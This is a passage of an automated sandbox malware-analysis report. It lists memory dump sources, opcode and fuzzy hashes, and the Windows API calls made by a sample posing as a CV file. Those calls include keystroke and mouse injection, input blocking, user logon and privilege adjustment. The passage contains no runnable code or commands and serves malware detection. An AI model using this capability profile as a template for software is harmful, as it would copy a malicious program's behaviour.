                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 07e355024991205bd81a53b401668cb4b9aeef7b0203afcdca5053b33c88f982
                                                                                        • Instruction ID: 429743e23648155ec83956af3c735a3d8466a3730206c4bf17557c9bb54a33d3
                                                                                        • Opcode Fuzzy Hash: 07e355024991205bd81a53b401668cb4b9aeef7b0203afcdca5053b33c88f982
                                                                                        • Instruction Fuzzy Hash: 46F08235510229ABDB11ABA4DC49FEA776DFF09352F004169F919D6181D6309A44CBA4
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003C4153
                                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 003C4166
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InputSendkeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 3536248340-0
                                                                                        • Opcode ID: a0980b94f5c5e6d86d5edf9d9c626acd5217cbad0c335491f51dfb61cfb660b0
                                                                                        • Instruction ID: 447d3de404ec9bf834227ad364d9fee180d103d5ca36bdbfa46273405d5ec440
                                                                                        • Opcode Fuzzy Hash: a0980b94f5c5e6d86d5edf9d9c626acd5217cbad0c335491f51dfb61cfb660b0
                                                                                        • Instruction Fuzzy Hash: E8F0677080024DAFDB069FA0CC05BBE7FB4EF00305F04801AF966A6292D7798A169FA4
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003BACC0), ref: 003BAB99
                                                                                        • CloseHandle.KERNEL32(?,?,003BACC0), ref: 003BABAB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 818f789049f769f4280e63bee281fc7dcc74c84ba1e5b9a90a3b1bf11779e135
                                                                                        • Instruction ID: e8d3dff357b3bc835441601f8f4c768f0896af154863feec93ebd2fa2c0fa915
                                                                                        • Opcode Fuzzy Hash: 818f789049f769f4280e63bee281fc7dcc74c84ba1e5b9a90a3b1bf11779e135
                                                                                        • Instruction Fuzzy Hash: C7E0BF71000510AFEB262F54ED05D767BA9EB04320711C529B95985470DB725C949B50
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,003A6DB3,-0000031A,?,?,00000001), ref: 003A81B1
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003A81BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 5cfaf87fe69b219c41bcc406a5c0e82880422af8cf6baf2c79a15183a0da8084
                                                                                        • Instruction ID: db2a0a7d1f28075f13e78cf74185e6d59cfc03f784146b53b9af76b1de98ca7c
                                                                                        • Opcode Fuzzy Hash: 5cfaf87fe69b219c41bcc406a5c0e82880422af8cf6baf2c79a15183a0da8084
                                                                                        • Instruction Fuzzy Hash: 7FB09231444608ABDB002BE1ED09B587F68EB08652F004030FE0D540618B7254188A9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 54c443a6ffba0bf11cd12a56eace215d4e918a77e27399e945d2a595ab8071b3
                                                                                        • Instruction ID: f2438ef10ad54e5ad97f741e7f5d8d9d82797e900d7f05b64b3c9fa7f6257dab
                                                                                        • Opcode Fuzzy Hash: 54c443a6ffba0bf11cd12a56eace215d4e918a77e27399e945d2a595ab8071b3
                                                                                        • Instruction Fuzzy Hash: 84320422D29F414DD7239634D922336A29CEFB73D4F15D737E82AB5DAAEB29C4834104
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 674341424-0
                                                                                        • Opcode ID: 8b59b4d11961e789f07e48aea945d2c377dc2ae9e9433920d66c7b9e24945933
                                                                                        • Instruction ID: 5b2e2cddbf5c0423550044b6e0ff4571cda3c18370e127cb06f38f3bc27d7cc0
                                                                                        • Opcode Fuzzy Hash: 8b59b4d11961e789f07e48aea945d2c377dc2ae9e9433920d66c7b9e24945933
                                                                                        • Instruction Fuzzy Hash: E422DD716083059FD726EF24C890B6FB7E4BF84310F19495EF99A8B291DB71E904CB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6ff953d64e878191c6320b0d032b1e51eebf917d91c94046ab3cffca200595d
                                                                                        • Instruction ID: dc02c792e29fa7fbf1397f8aa21f6b2daa26abd139d5ffd3cff33113f179635f
                                                                                        • Opcode Fuzzy Hash: d6ff953d64e878191c6320b0d032b1e51eebf917d91c94046ab3cffca200595d
                                                                                        • Instruction Fuzzy Hash: 12B1D120D2AF418DD22396398831376BB5CAFFB2D5F91D72BFC1A74D22EB2185834184
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 003CB6DF
                                                                                          • Part of subcall function 003A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003CBDC3,00000000,?,?,?,?,003CBF70,00000000,?), ref: 003A3453
                                                                                          • Part of subcall function 003A344A: __aulldiv.LIBCMT ref: 003A3473
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID:
                                                                                        • API String ID: 2893107130-0
                                                                                        • Opcode ID: 2275d33629e32d6c60695f890742155eec07a563f760c5993fadb721c8f751f1
                                                                                        • Instruction ID: a9a8a0cbed10aa2cd4c00640cbdf8382b43078d4a09a90893eba186ad11ade40
                                                                                        • Opcode Fuzzy Hash: 2275d33629e32d6c60695f890742155eec07a563f760c5993fadb721c8f751f1
                                                                                        • Instruction Fuzzy Hash: EF2160766345108BC72ACF28C481A52F7E5EB95711B248E7DE4E5CB280CB74AD05DB54
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 003D6ACA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: fd1947c175905fa70d339604a4ecc2477d354fe353f72567c54df0c21725a690
                                                                                        • Instruction ID: 861af550f9da65d2a11c742fba9ae6b72ce59cf3c71da3226f8810bef482ab19
                                                                                        • Opcode Fuzzy Hash: fd1947c175905fa70d339604a4ecc2477d354fe353f72567c54df0c21725a690
                                                                                        • Instruction Fuzzy Hash: 39E012762102046FC701EB99D405956B7ECAF64751F058866F955DB391DAB0E8048B90
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003C74DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: 2dc469f81a368d53133a0e21edb235203bd7b80df59939a09595a6d177235076
                                                                                        • Instruction ID: dab109d6e85d3873259ffead76cd9113e7082fcafa3e22fb824010d873186edc
                                                                                        • Opcode Fuzzy Hash: 2dc469f81a368d53133a0e21edb235203bd7b80df59939a09595a6d177235076
                                                                                        • Instruction Fuzzy Hash: 19D05EA052C30538EC2F0726CC0FF761908F3107C1F82818DBC82D94C1B8905C059B32
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003BAD3E), ref: 003BB124
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: a60d47302eb4b5416e5c5ea390b1ce806f57d78e69a1e9ed745eade95ad7e36b
                                                                                        • Instruction ID: 7e4330ae4a6fc42007b15a89c37bd6b8b25d96e988a6902d6b706cb85fb01888
                                                                                        • Opcode Fuzzy Hash: a60d47302eb4b5416e5c5ea390b1ce806f57d78e69a1e9ed745eade95ad7e36b
                                                                                        • Instruction Fuzzy Hash: FCD05E320A460EAEDF024FA4DC02EAE3F6AEB04700F408110FA15D50A0C671D531AB50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: b4b08e4a8958c1ad77799cf91608970849a97dfb50cf8eec5c85899accd1f6e9
                                                                                        • Instruction ID: c22dc80f904c4a94e742e7410026e26e9aadb7b70b1110f51cafd72d0f77f20d
                                                                                        • Opcode Fuzzy Hash: b4b08e4a8958c1ad77799cf91608970849a97dfb50cf8eec5c85899accd1f6e9
                                                                                        • Instruction Fuzzy Hash: 99C04CF180054DDFD752CFC0CA449EEB7BCAB08705F1040919249F1110D7709B459B76
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 003A818F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 773e44196d76e37d0f91e5f4525e3f375294106729bf0de2bc52bae0ffb41a89
                                                                                        • Instruction ID: cdca553b68064fbd9e736c1f36847c59dd1211d58687d6fa3e69002d904e1ed5
                                                                                        • Opcode Fuzzy Hash: 773e44196d76e37d0f91e5f4525e3f375294106729bf0de2bc52bae0ffb41a89
                                                                                        • Instruction Fuzzy Hash: A1A0113000020CABCF002B82EC088883F2CEA002A0B000030FC0C000208B32A8288A8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0640add07c37d395bd1b6a2626f1e5bc848ab38ea98471f9ac7434b873135a80
                                                                                        • Instruction ID: 4fe769de22d4bc11c1685e1305941443b53345dde6339529c1184c917bf61ee6
                                                                                        • Opcode Fuzzy Hash: 0640add07c37d395bd1b6a2626f1e5bc848ab38ea98471f9ac7434b873135a80
                                                                                        • Instruction Fuzzy Hash: 76127C70A00609EFDF06EFA5D981ABEB7F9FF48300F148569E406EB251EB35A914CB54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5569346d746e0022abd362a7322305be68b469c42d68b508eae403c9aa83db5d
                                                                                        • Instruction ID: 2b9338d23c5df2700368f88122858ac4061a9e12676ce4da1ecb19f8129398d6
                                                                                        • Opcode Fuzzy Hash: 5569346d746e0022abd362a7322305be68b469c42d68b508eae403c9aa83db5d
                                                                                        • Instruction Fuzzy Hash: E412B070A0430ACFDB26EF54C480ABEB7B1FF15314F1580A9E95AAB351E735AD81CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3728558374-0
                                                                                        • Opcode ID: c8bb4f92d48ec0abbee75d6081f5a5b98b8961e3b279d344f99280978bc23ba5
                                                                                        • Instruction ID: fd30c10dfc92ca42b7825a8a851ae724ece70a0e5359f0fdb87ca05df76dd152
                                                                                        • Opcode Fuzzy Hash: c8bb4f92d48ec0abbee75d6081f5a5b98b8961e3b279d344f99280978bc23ba5
                                                                                        • Instruction Fuzzy Hash: 4F0290B0A00209DFCF06EF68D991AAEB7B5FF44300F1184A9E906DF255EB35DA15CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                        • Instruction ID: 95452724141efe44ec1dcc2ec8e13ad3c95779637a5ed28ab8545db62d29cb20
                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                        • Instruction Fuzzy Hash: D7C1A3366051930EDF2F463AC47453EBAA19AA3BB531B076DD8B3CB5D5EF20C524D620
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                        • Instruction ID: 4b84d649e39560dee6ea3d9ce18f49d7946e7f1ca022a29f9ae20ad45a92373f
                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                        • Instruction Fuzzy Hash: 31C18F322051930EEF6E463AC47453EBAA19EA3BB131B176DD4B3CB5D5EF20D524D620
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction ID: 0296f0b77aebd372d6ff33186b2fba53c7c67554552b781c57e3912e6c97d4bc
                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction Fuzzy Hash: 2EC16C326091930EDF2F463AC47443EBAA15AA2BB531B077DD8B3CB5E5EF20D564D620
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
